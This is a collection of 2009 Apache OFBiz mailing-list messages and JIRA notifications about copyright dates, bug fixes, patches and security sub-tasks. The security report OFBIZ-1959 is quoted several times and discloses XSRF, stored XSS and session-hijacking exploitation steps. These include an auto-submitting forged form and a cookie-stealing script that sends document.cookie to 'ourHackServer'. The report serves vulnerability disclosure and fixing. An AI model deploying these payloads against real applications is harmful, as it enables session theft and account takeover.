Subject: Re: svn commit: r772941 - in /ofbiz/trunk:
framework/common/ webcommon/includes/fo/
framework/webtools/webapp/webtools/entity/
specialpurpose/ecommerce/webapp/ecommerce/includes/ specialpurpose/
webpos/webapp/webpos/includes/ themes/flatgrey/includes/ themes...
I think we should undo this change. The dynamic dates represented
here do not copyright the files that the code is in, they
copyright what the code produces, and that is constantly
changing so the dynamic date is appropriate.
-David
On May 8, 2009, at 5:15 AM, jler...@apache.org wrote:
Author: jleroux
Date: Fri May 8 11:15:08 2009
New Revision: 772941
URL: http://svn.apache.org/viewvc?rev=772941&view=rev
Log:
See http://markmail.org/message/znytl2y4inpmxbdo (David
Goodenough's advice on copyright update)
extract : "My understanding of the Berne Convention rules for
Copyright (which covers most jurisdictions - even the USA
now), is that the copyright period only gets extended when the
copyrigh
[jira] Created: (OFBIZ-2450) Error deleting ContactMechPurpose for party PostalAddress
Error deleting ContactMechPurpose for party PostalAddress
-
Key: OFBIZ-2450
URL: https://issues.apache.org/jira/browse/OFBIZ-2450
Project: OFBiz
Issue Type: Bug
Components: party
Affects Versions: Release Branch 9.04
Reporter: Vince Clark
Priority: Minor
Here is the error message displayed in the screen:
org.ofbiz.widget.screen.ScreenRenderException: Error rendering screen
[component://party/widget/partymgr/PartyScreens.xml#editcontactmech]:
groovy.lang.MissingMethodException: No signature of method: static
org.ofbiz.party.contact.ContactMechWorker.getContactMechAndRelated() is
applicable for argument types: (org.apache.catalina.connector.RequestFacade,
javolution.util.FastList, java.util.HashMap) values:
{org.apache.catalina.connector.requestfac...@2cef66, ["10014", "10014"], [:]}
(No signature of method: static
org.ofbiz.party.contact.ContactMechWorker.getContactMechAndRelated() is
applicable for argument types: (org.apache.catalina.connector.RequestFacade,
javolution.util.FastList, java.util.HashMap) values:
{org.apache.catalina.connector.requestfac...@2cef66, ["10014", "10014"], [:]})
To reproduce:
1. Create a postal address for a party (or use an existing postal address)
2. Add a purpose to the postal address
3. Try to delete the purpose
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-2445) Show Billing Account Info on the Party Profile
[
https://issues.apache.org/jira/browse/OFBIZ-2445?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707686#action_12707686
]
Vivek Mishra commented on OFBIZ-2445:
-
Hello Pranay,
I am uploading the patch for showing billing account and return information in
party component.
Steps for testing :-
1. Create a sales order, it should be in approved status
2. Create a return.
3. Go to party component and select a party for which the order has been
created.
4. Click Financial history tab.
> Show Billing Account Info on the Party Profile
> --
>
> Key: OFBIZ-2445
> URL: https://issues.apache.org/jira/browse/OFBIZ-2445
> Project: OFBiz
> Issue Type: Improvement
> Components: party
>Affects Versions: SVN trunk
>Reporter: Pranay Pandey
> Fix For: SVN trunk
>
> Attachments: ShowBillingAccountOnPartymgr.patch
>
>
> Show Billing Account Info and returns as well to show outstanding returns on
> the Party Profile
> There is a Financial History ("Fin. History") tab on the profile in the Party
> Manager but it only contains information about invoice and payments. Add
> information about Billing Account(s) and available credit on this page. Add
> section about returns as well to show outstanding returns with status.
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
Re: svn commit: r772941 - in /ofbiz/trunk: framework/common/webcommon/includes/fo/ framework/webtools/webapp/webtools/entity/ specialpurpose/ecommerce/webapp/ecommerce/includes/ specialpurpose/webpos/
the jira for ModelInduceFromDb.jsp already has it in it
if you want I can do the other two and include them in the same jira
https://issues.apache.org/jira/browse/OFBIZ-2432
Jacques Le Roux sent the following on 5/9/2009 5:38 AM:
> I have finally reverted r772941 at r773211
> To be consistent, I have replaced 2009 by ${nowTimestamp?string("")}
> in specialpurpose/cmssite/template/ofbiz/ofbizFooter.ftl at r773216
>
> If someone is interested, I did not take the time to think about
> ModelInfo.java
> ModelWriter.jsp
> ModelInduceFromDb.jsp
>
> Jacques
>
> From: "Jacques Le Roux"
>> I had a look, in US seems to be 95 or 120 years in our case <> work of corporate authorship, 95 years from publication or 120
>> years from creation, whichever expires first>>
>> What is less clear to me is if a release is a publication and if
>> creation is begining with Undersun or Apache Era (I guess Apache
>> Era)... Moreover things are not the same in EU, etc.
>>
>> Headache :/
>>
>> I think you are right David. We should simplify our work and use
>> automatic date copyright generation for all artifacts generated.
>> If someone has a better understanding of all these things please chime
>> in, I give up!
>>
>> Jacques
>>
>> From: "Jacques Le Roux"
>>> From: "David E Jones"
Yes, we do need an end date (or not start date). Copyright
protection has a limited time period, I believe something like 10
years for things like this. Because of that copyright holders have
an incentive to update the copyright date as they release
new editions.
>>>
>>> In EU seems to be 70 years (IANAL), anyway I understand why people
>>> update the copyright now. But are we sure that a new edition
>>> allows to break the 10-70 years ?
>>>
Again, please keep in mind the difference between a copyright
message for a specific file in the project, and a copyright
message that represents that output generated by the system (which
copyright is typically customized when the system is
deployed, BTW).
>>>
>>> I see the difference, but is this legal ? What does it means ? If
>>> OFBiz is still used in 2100 but not updated since 2050, this
>>> means that the generated outputs are still protected but not the
>>> software itself !?
>>>
The files changed here are for the copyright statements which cover
generated output, so the substantial change issue is
satisfied, and in fact it has nothing to do with it because each
page generated is a unique work and not tied to a previous
page.
>>>
>>> Are you sure we legally able to differentiate the work (OFBiz) and
>>> its generated outputs ?
>>>
In the headers for each file in the project what really should
happen is that people update the copyright date when they make
substantial changes to each file. Trying to remember that and keep
track of it is not terribly likely and is a real pain as
another thing on top of dozens already for people to remember.
>>>
>>> I have already forgotten, what were you speaking about ? ;p
>>>
The best solution for those headers (which again has nothing to do
with this particular commit) is probably to do a review once
a year of all files with more than X lines (probably 5-10) of
changes, and then update the headers on those (if they haven't
already been updated).
>>>
>>> Yes sounds like a good policy
>>>
>>> Jacques
>>>
-David
On May 8, 2009, at 9:49 AM, Jacques Le Roux wrote:
> Also I (we?) have not checked this rule
> http://www.law.cornell.edu/treaties/berne/overview.html . I just
> tried but did not find
> anything obvious...
> Some links
> http://itlaw.wikia.com/wiki/Copyright_duration
> http://en.wikipedia.org/wiki/Copyright#Duration
> http://en.wikipedia.org/wiki/Directive_on_harmonising_the_term_of_copyright_protection#Duration_of_protection
>
>
> Finally I wonder now if we really need to put and end date there...!
>
> Maybe David Goodenough can enlighten us ?
>
> Jacques
>
>
> From: "David E Jones"
> Subject: Re: svn commit: r772941 - in /ofbiz/trunk:
> framework/common/ webcommon/includes/fo/
> framework/webtools/webapp/webtools/entity/
> specialpurpose/ecommerce/webapp/ecommerce/includes/ specialpurpose/
> webpos/webapp/webpos/includes/ themes/flatgrey/includes/ themes...
>
>
>>
>> I think we should undo this change. The dynamic dates represented
>> here do not copyright the files that the code is in, they
>> copyright what the code produces, and that is constantly
>> changing so the dynamic date is appropriate.
>>
>> -David
>>
>>
>> On May 8, 2009, at 5:15 AM, jler...@apache.org wrote:
>>
>>> Author: jleroux
>>> Date: Fri May 8 11:15:08 2009
>>> New Revision: 772941
>>>
>>> URL: http://svn.apache.org/viewvc?rev=772941&view=rev
>>> Log:
>
[jira] Updated: (OFBIZ-2445) Show Billing Account Info on the Party Profile
[
https://issues.apache.org/jira/browse/OFBIZ-2445?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Vivek Mishra updated OFBIZ-2445:
Attachment: ShowBillingAccountOnPartymgr.patch
Patch for showing Billing Account and return information on partymgr.
> Show Billing Account Info on the Party Profile
> --
>
> Key: OFBIZ-2445
> URL: https://issues.apache.org/jira/browse/OFBIZ-2445
> Project: OFBiz
> Issue Type: Improvement
> Components: party
>Affects Versions: SVN trunk
>Reporter: Pranay Pandey
> Fix For: SVN trunk
>
> Attachments: ShowBillingAccountOnPartymgr.patch
>
>
> Show Billing Account Info and returns as well to show outstanding returns on
> the Party Profile
> There is a Financial History ("Fin. History") tab on the profile in the Party
> Manager but it only contains information about invoice and payments. Add
> information about Billing Account(s) and available credit on this page. Add
> section about returns as well to show outstanding returns with status.
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-1525) Issue to group security concerns
[ https://issues.apache.org/jira/browse/OFBIZ-1525?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-1525: --- Summary: Issue to group security concerns (was: Issue to group current existing security concerns) > Issue to group security concerns > > > Key: OFBIZ-1525 > URL: https://issues.apache.org/jira/browse/OFBIZ-1525 > Project: OFBiz > Issue Type: Improvement > Components: ALL COMPONENTS >Affects Versions: SVN trunk >Reporter: Jacques Le Roux >Assignee: Jacques Le Roux > > The goal of this virtual issue is only to group together all OFBiz security > issues (pending or closed). > Note that there are no *proved* security issue currently, just possible > breaches. > This issue should never be closed -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-1959) Remaining XSRF issues
[ https://issues.apache.org/jira/browse/OFBIZ-1959?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-1959: --- Summary: Remaining XSRF issues (was: Multiple Security Issues (XSRF, XSS, Session Hijacking): exploitation and mitigation) > Remaining XSRF issues > -- > > Key: OFBIZ-1959 > URL: https://issues.apache.org/jira/browse/OFBIZ-1959 > Project: OFBiz > Issue Type: Sub-task > Components: ALL COMPONENTS >Affects Versions: Release Branch 9.04, SVN trunk >Reporter: Michele Orru >Priority: Critical > Fix For: Release Branch 9.04, SVN trunk > > > +++|||Discovered security > issues|||+ > > 1.: Cross Site Request Forgery (XSRF) on almost every front/back-end > requests > 2.: reflected/stored XSS in search, ProductId/Product Internal name and > so on > 3.: Session Hijacking > +++|||Exploitation|||+ > 1.: As can be verified with your favorite proxy tool (we use Burp), POST > request > parameters are never "fortified" to prevent XSRF: no random token protection > can be seen. > For those who don't know what a XSRF is: briefly it is a request that me, the > attacker, force you (the victim) > to executes. > - In GET requests it will be a link like > http://x.x.x.x/account/doTransfer?from=666&to=667, where 666 is > a potential victim account and 667 the attacker one. > - In POST requests it will be an auto-submit form or a XMLHttpRequest > (if we would like to be more sophisticated). > I can force a victim to execute such a request in various methods, whose > description is out from the scope of this ISSUE: > malicious mail link, link in chat programs, malicious pages, man in the > middle attacks, malicious Flash/Applets/ActiveX, and so on. > The quick-and dirty code to make the XSRF attack looks as the following > innocuous one: > > > action="https://127.0.0.1:8443/catalog/control/createProduct";> > > > > > > document.xsrf.submit(); > Of course the product-creation mechanism is not finished (we need price, > content and ProductName), > but is just to let you understand. > When this JS code will be present in a malicious page (opened by a new tab of > the same browser - not Chrome ahah), > his content will be automatically executed and the POST request will be sent > to the application: the product with Id=hack02 > will be persisted inside the DB. Of course a valid party must be logged in > the catalog module, in a way > that the global JSESSIONID cookie value will be the same in every tab of the > browser. > Clearly we can do more than this... > 2.: As most of the Ofbiz forms are vulnerable to XSS, some reflected and some > stored, > exploit them is quite easy: we will exploited only stored ones. > We can for instance replace the value of internalName (that even if it is a > needed > parameter is quite un-useful and so prone to store our malicious code) with > something > like: > > > value="alert(document.cookie)"> > > The malicious code will display every cookie information in a pop-up, that > only the victim > will see: obviously we don't want this. > 3.: We can then create a little cookie-grabber servlet that listen for GET > request from > our victims, extract the useful parameters and store them in a file or DB, in > a way > that wen can hijack the session of the admin/manager. > > The internalName value is prone to store our malicious code also because his > maxlength > is 255 characters: this gives us a great advantage when creating a complex > injection code, > if we don't want to inject a link to the malicious script like > http://x.x.x.x/malicious.js";> > > The malicious code will look as the following one: > > > var > str="http://ourHackServer/CookieWebServlet?cookie="+document.cookie+"&url="+document.URL; > > if(document.cookie.indexOf("done")<0)\{ > document.cookie="done=true"; > document.location.replace(str); > } > > > Of course the code can be a lot shorter, and the "already-exploited-check" > can be removed. > > After we have a valid JSESSIONID, if we open a browser, go to the grabbed URL > (remember document.URL) that will be an > authentication-required resource, the login page will ask us for valid > credentials. > In Opera (or Firefox with AnEC Cookie Editor plugin) we can see that a new > cookie has been > given to us, because
[jira] Updated: (OFBIZ-2449) Secure targets in widget forms
[
https://issues.apache.org/jira/browse/OFBIZ-2449?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Jacques Le Roux updated OFBIZ-2449:
---
Description:
We have also targets with params in URL in forms, despite it's already using
POST action
In *form*.xml look for
{code}
<> (24 instances)
<> ( 23 instances)
{code}
An easy example to use is ListPhysicalInventory.
So we should extend the param-name scheme to forms widget also.
Maybe some targets are not calling services and so are not real threats (no
changes possible in DB). But we have already chosen to change all hyperlinks in
the same case and not to try to filter them.
was:
We have also targets with params in URL in forms, despite it's already using
POST action
Look for <> (24 instances) and
<> ( 23 instances) in *form*.xml.
An easy example to use is ListPhysicalInventory.
So we should extend the param-name scheme to forms widget also.
Maybe some targets are not calling services and so are not real threats (no
changes possible in DB). But we have already chosen to change all hyperlinks in
the same case and not to try to filter them.
> Secure targets in widget forms
> --
>
> Key: OFBIZ-2449
> URL: https://issues.apache.org/jira/browse/OFBIZ-2449
> Project: OFBiz
> Issue Type: Sub-task
> Components: ALL COMPONENTS
>Affects Versions: Release Branch 9.04, SVN trunk
>Reporter: Jacques Le Roux
> Fix For: Release Branch 9.04, SVN trunk
>
>
> We have also targets with params in URL in forms, despite it's already using
> POST action
> In *form*.xml look for
> {code}
> <> (24 instances)
> <> ( 23 instances)
> {code}
> An easy example to use is ListPhysicalInventory.
> So we should extend the param-name scheme to forms widget also.
> Maybe some targets are not calling services and so are not real threats (no
> changes possible in DB). But we have already chosen to change all hyperlinks
> in the same case and not to try to filter them.
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
[jira] Created: (OFBIZ-2449) Secure targets in widget forms
Secure targets in widget forms -- Key: OFBIZ-2449 URL: https://issues.apache.org/jira/browse/OFBIZ-2449 Project: OFBiz Issue Type: Sub-task Components: ALL COMPONENTS Affects Versions: Release Branch 9.04, SVN trunk Reporter: Jacques Le Roux Fix For: Release Branch 9.04, SVN trunk We have also targets with params in URL in forms, despite it's already using POST action Look for <> (24 instances) and <> ( 23 instances) in *form*.xml. An easy example to use is ListPhysicalInventory. So we should extend the param-name scheme to forms widget also. Maybe some targets are not calling services and so are not real threats (no changes possible in DB). But we have already chosen to change all hyperlinks in the same case and not to try to filter them. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-2436) Improvement in Verify Pick screen to issue items as well when shipment is created
[ https://issues.apache.org/jira/browse/OFBIZ-2436?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707681#action_12707681 ] Akash Jain commented on OFBIZ-2436: --- Thanks Ashish :) Regards -- Akash Jain > Improvement in Verify Pick screen to issue items as well when shipment is > created > - > > Key: OFBIZ-2436 > URL: https://issues.apache.org/jira/browse/OFBIZ-2436 > Project: OFBiz > Issue Type: Sub-task > Components: product >Affects Versions: SVN trunk >Reporter: Pranay Pandey >Assignee: Vikas Mayur >Priority: Minor > Fix For: SVN trunk > > Attachments: IssuanceServices.patch, ItemIssuance.patch, > ItemIssuance.patch > > > Improvement in Verify Pick screen to issue items as well when shipment is > created in Picked status: > # When shipment is created and marked PICKED should also be issued items > (ItemIssuance) > # Once order items are verified on this screen, Packing screen should use the > same shipment created. > # Also reduce code for Packing which has to be moved to Very Pick now. > *The process will be:* > # Create a sales order with 4 to 5 items. > # Go to Facility-->Verify Pick, enter orderId and very order items. > # After all items are verified shipment should be created in PICKED status, > invoice will be generated in INVOICE_IN_PROCESS along with item issuance. > # Now go Facility-->Packing, enter verified oderId and complete pack, now > this process will utilize the same shipment, invoice created in Verify Pick > process only status of shipment will be changed to PACKED after completion. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-2436) Improvement in Verify Pick screen to issue items as well when shipment is created
[ https://issues.apache.org/jira/browse/OFBIZ-2436?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707679#action_12707679 ] Ashish Vijaywargiya commented on OFBIZ-2436: Thanks Akash for your contribution. Patch is in trunk at rev 773229. -- Ashish Vijaywargiya > Improvement in Verify Pick screen to issue items as well when shipment is > created > - > > Key: OFBIZ-2436 > URL: https://issues.apache.org/jira/browse/OFBIZ-2436 > Project: OFBiz > Issue Type: Sub-task > Components: product >Affects Versions: SVN trunk >Reporter: Pranay Pandey >Assignee: Vikas Mayur >Priority: Minor > Fix For: SVN trunk > > Attachments: IssuanceServices.patch, ItemIssuance.patch, > ItemIssuance.patch > > > Improvement in Verify Pick screen to issue items as well when shipment is > created in Picked status: > # When shipment is created and marked PICKED should also be issued items > (ItemIssuance) > # Once order items are verified on this screen, Packing screen should use the > same shipment created. > # Also reduce code for Packing which has to be moved to Very Pick now. > *The process will be:* > # Create a sales order with 4 to 5 items. > # Go to Facility-->Verify Pick, enter orderId and very order items. > # After all items are verified shipment should be created in PICKED status, > invoice will be generated in INVOICE_IN_PROCESS along with item issuance. > # Now go Facility-->Packing, enter verified oderId and complete pack, now > this process will utilize the same shipment, invoice created in Verify Pick > process only status of shipment will be changed to PACKED after completion. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2371) Improvements in "Account" Screens
[ https://issues.apache.org/jira/browse/OFBIZ-2371?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chirag Manocha updated OFBIZ-2371: -- Attachment: SfaAccountsImprovements.patch Implemented the functionality of Accounts. > Improvements in "Account" Screens > - > > Key: OFBIZ-2371 > URL: https://issues.apache.org/jira/browse/OFBIZ-2371 > Project: OFBiz > Issue Type: Sub-task > Components: marketing >Affects Versions: SVN trunk >Reporter: Ashish Vijaywargiya >Priority: Minor > Fix For: SVN trunk > > Attachments: SfaAccountsImprovements.patch > > > Account should be treated as a PartyGroup. This group can be associated with > any type of party. Party can be either other Party Group or Person. > Each account will be in Account role. The Parties (more then one party) can > be associated with Party Group through Party Relationship by > partyRelationshipTypeId being "Parent_Account". > Left Navigation Section : There will be following link / section present in > left side. There will be two block in the left section similar to catalog. > 1) Shortcuts > 2) Quick Add Account > Shorcuts block contains following link : > - Create Account - Exists, modification required. > - Find Accounts - Exists, Modification required. > - Clone Account - It will navigate to the Party Group lookup form and from > there we should select the existing Account and lets clone it. > Quick Add Account : This block will be similar to that of the Quick Add form > for Lead and Contacts. > Lets keep only two fields in this block : Group Name (use "Account Name" on > GUI), Office Site Name (Use "Website" on GUI). > Right side will be the content area (body section). > 1) Modification in Create Account : > a) Add Few more fields.The sequence of the fields will be (R - Required) : > Fields from Party Group Entity : Group Name(R) (Use "Company Name") , Office > Site Name (Use "Website" on GUI), Annual Revenue, Number of Employees, Ticker > Symbol. > b) Modification in General Correspondence address : Remove the field Address > Field 2 from the form. Instead of this use Separate Block to have "Other > Correspondence Address" block and provide all the fields there. (Similar > thing that we do in Ecommerce application for Billing & Shipping Address). > 2) Modification in Find Account Screen : > a) Search the records that has partyTypeId ="Party_Group" and has > roleTypeId="Account" > b) Remove the Party Id field from the find form. > c) Rename the Party Group Name to Account Name on GUI. > d) The search result form will contain one more field titled "Email Address". > e) For providing easy navigation to the user change Party Id field link to > Edit button. Also remove the Party ID label from the top. As we have changed > it to Edit link. > f) Remove the "Type" column from the Search Result area. All the Account name > will be in role "Party_Group". > 3) Modification on Summary Section : > a) Add the screenlet section that will contain the contacts associated with > this Party Group (i.e Account). Also Provide small form at the bottom of > party list to add the other contacts on the existing list. For this provide > one lookup to search contacts (Person in the role of Contact) and then submit > button. If we do this through Ajax(Using Prototype Library) then it would be > good. The Contacts (more then one contact) can be associated with Party Group > through Party Relationship by partyRelationshipTypeId being "Parent_Account". > b) Remove the Party Attribute block for now. It won't make any sense to me > for now. > c) The list of all the Work Efforts(Activities/ Event & Tasks) associated > with the Party Group.Provide option to associate the existing work effort > record with the party. Create/Update & Delete form. > 4) After editing any account (Party Group) we come to the Summary screen. > Provide another tab adjacent to it by name "Clone Account". Navigate to a > form where we could clone this record. > Rest of the functionality in the Accounts header should be tested properly. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Updated: (OFBIZ-2436) Improvement in Verify Pick screen to issue items as well when shipment is created
[ https://issues.apache.org/jira/browse/OFBIZ-2436?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Akash Jain updated OFBIZ-2436: -- Attachment: IssuanceServices.patch In last patch, I mistakenly removed conditional code, which checks if "Reserved Inventory does not remains, then status of Order item is changed to complete". And this beaked the functionality of "Quick Ship Entire Order" button (order status not changed to completed) So added back this code and also added extra condition to check that if shipment is in picked status then order item will not get completed. Now "Quick Ship Entire Order" button works fine order will complete after click on it. > Improvement in Verify Pick screen to issue items as well when shipment is > created > - > > Key: OFBIZ-2436 > URL: https://issues.apache.org/jira/browse/OFBIZ-2436 > Project: OFBiz > Issue Type: Sub-task > Components: product >Affects Versions: SVN trunk >Reporter: Pranay Pandey >Assignee: Vikas Mayur >Priority: Minor > Fix For: SVN trunk > > Attachments: IssuanceServices.patch, ItemIssuance.patch, > ItemIssuance.patch > > > Improvement in Verify Pick screen to issue items as well when shipment is > created in Picked status: > # When shipment is created and marked PICKED should also be issued items > (ItemIssuance) > # Once order items are verified on this screen, Packing screen should use the > same shipment created. > # Also reduce code for Packing which has to be moved to Very Pick now. > *The process will be:* > # Create a sales order with 4 to 5 items. > # Go to Facility-->Verify Pick, enter orderId and very order items. > # After all items are verified shipment should be created in PICKED status, > invoice will be generated in INVOICE_IN_PROCESS along with item issuance. > # Now go Facility-->Packing, enter verified oderId and complete pack, now > this process will utilize the same shipment, invoice created in Verify Pick > process only status of shipment will be changed to PACKED after completion. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online.
[jira] Commented: (OFBIZ-1959) Multiple Security Issues (XSRF, XSS, Session Hijacking): exploitation and mitigation
[ https://issues.apache.org/jira/browse/OFBIZ-1959?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12707673#action_12707673 ] Sam Hamilton commented on OFBIZ-1959: - I am out of the office with no access to email until Monday 18th May - for any urgent issues issues please contact either Alex Duncan (alex.dun...@virtualvillage.com) or Andrea Schiffer (andrea.schif...@virtualvillage.com) > Multiple Security Issues (XSRF, XSS, Session Hijacking): exploitation and > mitigation > > > Key: OFBIZ-1959 > URL: https://issues.apache.org/jira/browse/OFBIZ-1959 > Project: OFBiz > Issue Type: Sub-task > Components: ALL COMPONENTS >Affects Versions: Release Branch 9.04, SVN trunk >Reporter: Michele Orru >Priority: Critical > Fix For: Release Branch 9.04, SVN trunk > > > +++|||Discovered security > issues|||+ > > 1.: Cross Site Request Forgery (XSRF) on almost every front/back-end > requests > 2.: reflected/stored XSS in search, ProductId/Product Internal name and > so on > 3.: Session Hijacking > +++|||Exploitation|||+ > 1.: As can be verified with your favorite proxy tool (we use Burp), POST > request > parameters are never "fortified" to prevent XSRF: no random token protection > can be seen. > For those who don't know what a XSRF is: briefly it is a request that me, the > attacker, force you (the victim) > to executes. > - In GET requests it will be a link like > http://x.x.x.x/account/doTransfer?from=666&to=667, where 666 is > a potential victim account and 667 the attacker one. > - In POST requests it will be an auto-submit form or a XMLHttpRequest > (if we would like to be more sophisticated). > I can force a victim to execute such a request in various methods, whose > description is out from the scope of this ISSUE: > malicious mail link, link in chat programs, malicious pages, man in the > middle attacks, malicious Flash/Applets/ActiveX, and so on. > The quick-and dirty code to make the XSRF attack looks as the following > innocuous one: > > > action="https://127.0.0.1:8443/catalog/control/createProduct";> > > > > > > document.xsrf.submit(); > Of course the product-creation mechanism is not finished (we need price, > content and ProductName), > but is just to let you understand. > When this JS code will be present in a malicious page (opened by a new tab of > the same browser - not Chrome ahah), > his content will be automatically executed and the POST request will be sent > to the application: the product with Id=hack02 > will be persisted inside the DB. Of course a valid party must be logged in > the catalog module, in a way > that the global JSESSIONID cookie value will be the same in every tab of the > browser. > Clearly we can do more than this... > 2.: As most of the Ofbiz forms are vulnerable to XSS, some reflected and some > stored, > exploit them is quite easy: we will exploited only stored ones. > We can for instance replace the value of internalName (that even if it is a > needed > parameter is quite un-useful and so prone to store our malicious code) with > something > like: > > > value="alert(document.cookie)"> > > The malicious code will display every cookie information in a pop-up, that > only the victim > will see: obviously we don't want this. > 3.: We can then create a little cookie-grabber servlet that listen for GET > request from > our victims, extract the useful parameters and store them in a file or DB, in > a way > that wen can hijack the session of the admin/manager. > > The internalName value is prone to store our malicious code also because his > maxlength > is 255 characters: this gives us a great advantage when creating a complex > injection code, > if we don't want to inject a link to the malicious script like > http://x.x.x.x/malicious.js";> > > The malicious code will look as the following one: > > > var > str="http://ourHackServer/CookieWebServlet?cookie="+document.cookie+"&url="+document.URL; > > if(document.cookie.indexOf("done")<0)\{ > document.cookie="done=true"; > document.location.replace(str); > } > > > Of course the code can be a lot shorter, and the "already-exploited-check" > can be removed. > > After we have a valid JSESSIONID, if we open a browser
[jira] Updated: (OFBIZ-2272) Secure URLs exceptions
[
https://issues.apache.org/jira/browse/OFBIZ-2272?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Jacques Le Roux updated OFBIZ-2272:
---
Issue Type: Sub-task (was: Improvement)
Parent: OFBIZ-1525
> Secure URLs exceptions
> --
>
> Key: OFBIZ-2272
> URL: https://issues.apache.org/jira/browse/OFBIZ-2272
> Project: OFBiz
> Issue Type: Sub-task
> Components: ALL COMPONENTS
>Affects Versions: Release Branch 9.04, SVN trunk
>Reporter: Jacques Le Roux
> Fix For: Release Branch 9.04, SVN trunk
>
> Attachments: param-name formules screens menus.txt, URLs secure
> exceptions.patch
>
>
> Here are theexceptions I crossed during the recent secure URLs action. I put
> it here for convenience but I attached also the patch. Beware this patch is
> only for demontration (to show problems, not solutions) and should *not* be
> applied of course.
> {code}
> Index: applications/content/widget/cms/CMSScreens.xml
> ===
> --- applications/content/widget/cms/CMSScreens.xml(revision 761874)
> +++ applications/content/widget/cms/CMSScreens.xml(working copy)
> @@ -171,7 +171,9 @@
>
>
>
> - text="${uiLabelMap.ContentGoToFind}"
> target="CMSContentFind?VIEW_INDEX=${CMSContentFindViewIndex}&${CMSContentFindQueryString}"
> style="tabletext"/>
> + text="${uiLabelMap.ContentGoToFind}" target="CMSContentFind"
> style="tabletext">
> + value="${CMSContentFindViewIndex}&${CMSContentFindQueryString}"/>
> +
> name="EditAddContentStuff"
> location="component://content/webapp/content/cms/CMSForms.xml" />
> enable-edit-name="notfound"
> edit-request="EditAddSubContent?MASTER_contentId=${MASTER_contentId}&MASTER_caContentIdTo=${MASTER_caContentIdTo}&MASTER_caContentAssocTypeId=${MASTER_caContentAssocTypeId}&MASTER_caFromDate=${MASTER_caFromDate}&MASTER_drDataResourceId=${MASTER_drDataResourceId}&caContentIdTo=${caContentIdTo}"/>
>
> @@ -217,7 +219,9 @@
>
>
>
> - text="${uiLabelMap.ContentGoToFind}"
> target="CMSContentFind?VIEW_INDEX=${CMSContentFindViewIndex}&${CMSContentFindQueryString}"
> style="tabletext"/>
> + text="${uiLabelMap.ContentGoToFind}" target="CMSContentFind"
> style="tabletext">
> + value="${CMSContentFindViewIndex}&${CMSContentFindQueryString}"/>
> +
> name="EditAddSubContentStuff"
> location="component://content/webapp/content/cms/CMSForms.xml" />
>
>
> Index: applications/product/widget/facility/FacilityScreens.xml
> ===
> --- applications/product/widget/facility/FacilityScreens.xml (revision
> 761874)
> +++ applications/product/widget/facility/FacilityScreens.xml (working copy)
> @@ -431,8 +431,12 @@
>
> - target="ViewFacilityInventoryByProductReport?${searchParameterString}"
> text="${uiLabelMap.CommonPrint}" style="buttontext"/>
> - target="ViewFacilityInventoryByProductExport?${searchParameterString}"
> text="${uiLabelMap.CommonExport}" style="buttontext"/>
> + target="ViewFacilityInventoryByProductReport" style="buttontext">
> + param-name="${searchParameterString}" text"
> value=""${uiLabelMap.CommonPrint}"/>
> +
> + target="ViewFacilityInventoryByProductExport" style="buttontext">
> + param-name="${searchParameterString}" text"
> value=""${uiLabelMap.CommonExport}"/>
> +
> text="${uiLabelMap.ProductInventoryItemTotals}" style="buttontext">
> from-field="facilityId"/>
> value="Y"/>
> Index: applications/product/widget/facility/ReportScreens.xml
> ===
> --- applications/product/widget/facility/ReportScreens.xml(revision
[jira] Updated: (OFBIZ-1959) Multiple Security Issues (XSRF, XSS, Session Hijacking): exploitation and mitigation
[ https://issues.apache.org/jira/browse/OFBIZ-1959?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Jacques Le Roux updated OFBIZ-1959: --- Issue Type: Sub-task (was: Bug) Parent: OFBIZ-1525 > Multiple Security Issues (XSRF, XSS, Session Hijacking): exploitation and > mitigation > > > Key: OFBIZ-1959 > URL: https://issues.apache.org/jira/browse/OFBIZ-1959 > Project: OFBiz > Issue Type: Sub-task > Components: ALL COMPONENTS >Affects Versions: Release Branch 9.04, SVN trunk >Reporter: Michele Orru >Priority: Critical > Fix For: Release Branch 9.04, SVN trunk > > > +++|||Discovered security > issues|||+ > > 1.: Cross Site Request Forgery (XSRF) on almost every front/back-end > requests > 2.: reflected/stored XSS in search, ProductId/Product Internal name and > so on > 3.: Session Hijacking > +++|||Exploitation|||+ > 1.: As can be verified with your favorite proxy tool (we use Burp), POST > request > parameters are never "fortified" to prevent XSRF: no random token protection > can be seen. > For those who don't know what a XSRF is: briefly it is a request that me, the > attacker, force you (the victim) > to executes. > - In GET requests it will be a link like > http://x.x.x.x/account/doTransfer?from=666&to=667, where 666 is > a potential victim account and 667 the attacker one. > - In POST requests it will be an auto-submit form or a XMLHttpRequest > (if we would like to be more sophisticated). > I can force a victim to execute such a request in various methods, whose > description is out from the scope of this ISSUE: > malicious mail link, link in chat programs, malicious pages, man in the > middle attacks, malicious Flash/Applets/ActiveX, and so on. > The quick-and dirty code to make the XSRF attack looks 